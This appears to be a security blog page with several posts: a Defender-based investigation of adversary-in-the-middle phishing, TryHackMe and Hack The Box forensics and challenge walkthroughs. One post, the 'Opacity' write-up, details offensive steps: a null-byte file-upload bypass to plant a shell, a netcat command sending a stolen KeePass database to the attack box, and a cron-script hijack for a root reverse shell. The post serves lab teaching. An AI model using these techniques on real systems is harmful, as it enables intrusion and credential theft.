Wednesday, February 7, 2024

AiTM Phishing - Defender Investigation

AiTM - Phishing

Adversary in The Middle attacks seem to be on the rise and over the past few months I have seen a lot of attacks using EvilGINX and similar tools. Here is a quick guide for a first round of analysis when seeing this activity. 

The Attack

This attack vector is different to traditional phishing and a lot harder to protect users from. Upon a successful attack, the user is proxied to the site they are trying to log into, so as far as they are aware, they've legitimately logged in. This attack steals the users session cookie and bypasses any MFA protection. EvilGINX will also create a valid certificate giving the phishing site that lock we've always told users to look out for...

I won't go into the full attack here but if you want to read more there is a great talk from the creator, Kuba Gretzky, here , and a demo from John Hammond here


I am looking at this from Microsoft Defenders point of view, mostly because all of the alerts I've seen have sourced from Defender. When an alert comes in, the first thing I do is look into the domain, in this example a phishing email was sent to the user with a link to http[:]//findmedoc[.]site. Throwing the domain into VirusTotal shows it is clean

I've found every domain in these attacks to be clean, the reason for this is that they are, it's proxying the actual login page. We want to look out for the age of the domain, in VT we can find this in the details tab.
A newly registered domain being sent as a link via email is the red flag to take action! 

Check whois records for further information.

Everything about this domain is a worry. 

Due to the Defender alert being generated from the user actually clicking the link, you might want to think about disabling the user and resetting passwords before doing any further investigation. 

We can see the user clicked the link, we also get the IP which will be useful to look for potential logins. 

Now it is very likely the attacker will pivot IP for the login, but I've rarely seen that. 

My next actions will be to just disable the user, reset and then investigate related activity. It's better to ask for forgiveness for blocking a user.. you don't want to be on the other type of call... 

Click the View Related Activity as we want to see if the attacker is in the account and what they are doing. 

First, search for the IP seen under the "Raw IP" filter

We want to look for:
Successful Log ons
Any mailbox rules being created
Sharepoint activity

The final check, as the attacker could have switched IP from the phish, we look at the account login locations, User Page > Locations > Click the number

We want to investigate, if possible, all locations. At a minimum, look at all logins from any country outside of the users normal geography. 

Hopefully this has been helpful!

Friday, January 12, 2024

THM - Digital Forensics Case B4DM755

TryHackMe | Digital Forensics Case B4DM755

Room Objectives

Learn about the following to build up the confidence of future Forensics Lab Analysts, DFIR First Responders, and Digital Forensics Investigators:

  • Ensure proper Chain of Custody procedures for transport to the Forensics Laboratory.
  • Use FTK Imager to acquire a forensic disk image and preserve digital artefacts and evidence.
  • Analyse forensic artefacts received at the Forensics Laboratory for presentation during a trial in a court of law.

Case B4DM755 - Details

Answering the first few sections is all pretty simple and the answers are in the content. 


As a Forensics Lab Analyst, you analyse the artefacts from crime scenes. Occasionally, the law enforcement agency you work for receives "intelligence reports" about different cases, and today is one such day. A trusted informant, who has connections to an international crime syndicate, contacted your supervisor about William S. McClean from Case #B4DM755.

The informant provided information about the suspect's whereabouts in Metro Manila, Philippines, which is currently at large, and a transaction that will happen today with a local gang member. They also knew the exact location of the meetup and that the suspect would have incriminating materials at the time.

The law enforcement agency prepared for the operation by obtaining proper search authority and assigning a DFIR (Digital Forensics & Incident Response) First Responder (i.e., you) to ensure the appropriate acquisition of digital artefacts and evidence for examination at the Forensics Lab, and eventually for use in litigation. The court issued a search warrant on the same day, allowing law enforcement officers to investigate the suspect and his place of residence based on the informant's tip.

FTK Imager

FTK Imager is a forensics tool that allows forensic specialists to acquire computer data and perform analysis without affecting the original evidence, preserving its authenticity, integrity, and validity for presentation during a trial in a court of law.

On the VM load up FTK Imager, the "Evidence" is an emulated flash drive located \\PHYSICALDRIVE2 - Microsoft Virtual Disk [1GB SCSI]

The following steps will add the Evidence:

File > Add Evidence Item

Choose Physical Drive

Select the correct drive, in this case it is Microsoft Virtual Disk [1GB SCSI]

Next check for encryption

File > Detect EFS Encryption

In this scenario there is no encryption present. 

As we learnt in the previous task, we have to create an image of the drive, we should never perform forensics on the original as this will tamper with the evidence. 

File > Create Disk Image

Select Physical Drive as the source

Select the correct source, again in this example it is Microsoft Virtual Disk [1GB SCSI]

The task shows up real world operations, we have to ensure we Verify images after they are created, and Create directory listing of all files in the image after they are created. Under the Image Destinations(s) click add and set the Destination Image Type as Raw (dd). Finally, fill out the Evidence Item Information, set the Image Destination. Click start

Ensure the hashes match and there are no bad blocks listed. 

The following can now be answered:

What is the UI element of FTK Imager which displays the content of selected files?

What is the SHA1 hash of the physical drive and forensic image?

We now want to add the copy as our Evidence to investigate, this is a little different to before. 

File > Add Evidence Item

Choose Image File

Browser to the location the Image was saved to and select

We can now remove original Drive from the Evidence Tree

right-click and Remove Evidence Item

We want to analyst and inspect the contents of the drive, be sure to look for delete items, corrupted files, and any obfuscation. Deleted files can be identified by the red cross through the file type icon. 

To recover these deleted files we want to Export Files. Right-click on the target directory and click Export Files, this will save the artefacts. 

We can now answer the final questions of this task:

Including hidden files, how many files are currently stored on the flash drive?

How many files were deleted in total?

How many recovered files are corrupted (e.g., 0 file size)?

Task 7

Aside from FTK Imager, what is the directory name of the other tool located in the tools directory under Desktop?

Navigate to the desktop and look inside the Tools folder. 

What is the visible extension of the "hideout" file?

This can be found within FTK Imager or the exported files, the file is named

View the metadata of the "hideout" file. What is its actual extension?

We can use the tool exiftool.exe, run it or from the commandline exiftool.exe "C:\Users\analyst\Desktop\artefacts\[root]\hideout.pdf" be sure to set the path to where you exported the files. 

This will reveal what the file really is. 

A phone was used to photograph the "hideout". What is the phone's model?

This can be found in the metadata under Camera Model Name 

A phone was used to photograph the "warehouse". What is the phone's model?

Same process using exiftool, again found under the Camera Model Name

Are there any indications that the suspect is involved in other illegal activity? (Y/N)

Use the exiftool to check all the files, one is not what it says it is and is actually a .zip, extract it. 

Who was the point of contact of Mr William S. McClean in 2022?

Check in the newly discovered .zip, there is a notes.txt file

A meetup occurred in 2022. What are the GPS coordinates during that time?

Can also be found in notes.txt

What is the password to extract the contents of

Have a guess... lol yup, notes.txt


From which company did the source code in the pandorasbox directory originate?

Look in the HFT_Algorithm directory, we see some python scripts. These scripts include a header, open with notepad

In one of the documents that the suspect has yet to sign, who was listed as the beneficiary?

Analyse the word docs, the Victim can be found in UTCL242231

What is the hidden flag?

The file named DONOTOPEN looks like it should definitely be opened... change it to a .txt

Task 8 can be answered from the content. 


Wednesday, May 17, 2023

THM - Windows Forensics 1


One of the Desktops in the research lab at Organization X is  suspected to have been accessed by someone unauthorized. Although they  generally have only one user account per Desktop, there were multiple  user accounts observed on this system. It is also suspected that the  system was connected to some network drive, and a USB device was  connected to the system. The triage data from the system was collected  and placed on the attached VM. Can you help Organization X with finding answers to the below questions?


How many user created accounts are present on the system?
Load the SAM hive found in
triage\C\Windows\System32\Config within here we can find the users. The question only wants user created accounts. Disregarding the builtin account we have 3

What is the username of the account that has never been logged in?
We can answer this within the same hive, there is only one user without a Last Login Time

What's the password hint for the user THM-4n6?

Can also be answered from within here :)

When was the file 'Changelog.txt' accessed?
Load the NTUSER hive, drill down to RecentDocs and check .txt files. 

What is the complete path from where the python 3.8.2 installer was run?
Within the User hive, drill down to the User Assist registry keys and look for the GUID with the most key values. Within here you can find all the applications which have executed.

When was the USB device with the friendly name 'USB' last connected?
The question is to find the USB device with the friendly name ‘USB’, let's look in
SOFTWARE\Microsoft\Windows Portable Devices\Devices

Further USB information can be found with the SYSTEM hive under:

Look at the device with the GUID matching the friendly named USB device.

Tuesday, April 25, 2023

THM - Opacity


Starting Nmap 7.93 ( ) at 2023-04-25 11:11 BST

Nmap scan report for

Host is up (0.022s latency).

Not shown: 65531 closed tcp ports (conn-refused)

22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
|_ 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-title: Login
|_Requested resource was login.php
| http-cookie-flags:
| /:
|_ httponly flag not set
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb2-time:
| date: 2023-04-25T10:11:28
|_ start_date: N/A

Service detection performed. Please report any incorrect results at .

Nmap done: 1 IP address (1 host up) scanned in 26.62 seconds

Port 80 open with Apache 2.4.41 running
SMB running

Login box at port 80

More enumeration!

└─$ smbclient -L \\\\
Password for [WORKGROUP\kali]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))

not much without authentication for SMB

└─$ smbmap -H
[+] IP: Name:
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))
START_TIME: Tue Apr 25 11:30:03 2023

WORDLIST_FILES: /usr/share/wordlists/dirb/big.txt
---- Scanning URL: ----

The cloud directory looks interesting!

We can try to upload things!


Whilst dirb was running in the background it also found , at an assumption this is where the uploaded images are stored.

I hosted a server and tried to upload a shell using . It didn't like this as it had to be an image.

I tried with just a space and then the .jpg, didn't work, using a null character #.jpg worked and we had a shell.. for a time. The 5 minutes file upload meant you only have 5 minutes until the files are deleted.

$ ls
$ whoami
$ cd home
$ ls
$ cd sysadmin
$ ls
$ cat local.txt
cat: local.txt: Permission denied

We have a second user, sysadmin, we want this one!

www-data doesn't have much access, there is a scripts folder but we don't have permissions for that, but we do have access to opt and there is an interesting file in there called dataset.kdbx. A kdbx file is a keepass database, we want this!

After some hunting I found we can transfer files using netcat (nc). To do this, on the destination host (our attack box) we want to listen for the file

Example: nc -l -p 7555 > myfile.txt
nc -lnvp 4446 > dataset.kdbx

On the source host (victim) we send the file:
nc 7555 < myfile.txt
nc 4446 < dataset.kdbx

We now have the file! Let's crack it.

Following the guide from we can pull out the hash using keepass2john and then crack the password.

keepass2john dataset.kdbx > hash.txt

Take the cracked password, open the database, get the new creds.

Remember, SSH is open, let's go get our first flag!


Now we're on the machine without a time limit we can take a breath and think of the next step. Under the sysadmin there is a script.php which is the script used to delete the files found within the images folder.. this does run every 5 minutes and could be useful. There are a bunch of php files under the lib directory.

sysadmin@opacity:~/scripts$ ls -lha
total 16K
drwxr-xr-x 3 root root 4.0K Jul 8 2022 .
drwxr-xr-x 6 sysadmin sysadmin 4.0K Feb 22 08:16 ..
drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 lib
-rw-r----- 1 root sysadmin 519 Jul 8 2022 script.php

Hello... the script is owned by root... but we can't edit :(

After a little, okay a lot, of thinking, we know root is running the script, we know there is a job to run the script.php from the scripts folder. What if we just make a new script which is a reverse shell? Let's give it ago, using the same script as before we can load that into a new scripts folder (moving/renaming the old one) call it script.php, set up the listener and wait....

Boom, it worked! From here we can get the final flag!

Really fun machine this one, luckily my brain has a small capacity and I totally forgot about SMB which wasn't required. The folder being cleared out stumped me for a while until the penny dropped and getting root being as simple as it was tripped me!

Monday, April 24, 2023

THM - Investigating Windows


This is a challenge that is exactly what is says on the tin, there are a few challenges around investigating a windows machine that has been previously compromised.


Whats the version and year of the windows machine?
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

Which user logged in last?
Get-LocalUser | Select Name, Lastlogon

When did John log onto the system last?
We can get that info from our last command

What IP does the system connect to when it first starts?
There will be a cmd pop up upon system login with the IP

What two accounts had administrative privileges (other than the Administrator user)?
net localgroup administrators

Whats the name of the scheduled task that is malicious.
Check the scheduled tasks, there will be a few obvious ones which stick out! Check the actions of each.

What file was the task trying to run daily?
Found under the actions of the malicious task.

What port did this file listen locally for?
Found under the actions of the malicious task.

When did Jenny last logon?
We can use
Get-LocalUser | Select Name, Lastlogon
Check the Security Log in EventViewer and filter for Jenny and EID 4624

At what date did the compromise take place?
Something was created for persistence, when?

At what time did Windows first assign special privileges to a new logon?
Search EID 4672 under the security log.

What tool was used to get Windows passwords?
We can find that within the TMP folder the attackers created.

What was the attackers external control and command servers IP?
Check the hosts file for any potential changes made by the attacker

What was the extension name of the shell uploaded via the servers website?
Check wwwroot

What was the last port the attacker opened?
Check the firewall rules for inbound, there are a few suspicious ports being opened to allow inbound connectivity.

Check for DNS poisoning, what site was targeted?
We found this within the hosts file.

Wednesday, April 5, 2023

HTB - Illumination

Initial Investigation & Solution

We can actually find the problem upon unzipping the challenge.

We see immediately that there is a .git folder along with what looks to be the log file!

Using git to read the log.

A token was removed as a security precaution, dig a little deeper and view the change.


There is the token! Looks to be base64 so simply decode and we have our flag!


Friday, March 17, 2023

HTB - Behind The Scenes

Initial Investigation

Upon running the application it asks us for ./challenge <password> 

Let's run strings and see what we find:

The interesting parts are we can see it is expected the password to be in the format HTB{something} 


We can throw the binary into Ghidra and see what else we find. Within the main it looks to stop. 

There is a UD2 instruction and then disassembly stops.  
After some research I found this within the Ghidra github . User pjsoberoi's comment is the solution:
"IMHO that is the correct behavior. You can manually disassemble the bytes after but that shouldn't change the decompilation. You can edit your own x86 slaspec and replace ud2 instruction with a "nop" pcode instruction. This should basically make the decompiler ignore the ud2 instruction. That seems like what you want." 
With this information I disassembled the rest.
We then run through and replace all the UD2 instructions with a NOP and slowly the code is built out until we eventually get our password and flag!



AiTM Phishing - Defender Investigation

AiTM - Phishing Adversary in The Middle attacks seem to be on the rise and over the past few months I have seen a lot of attacks using EvilG...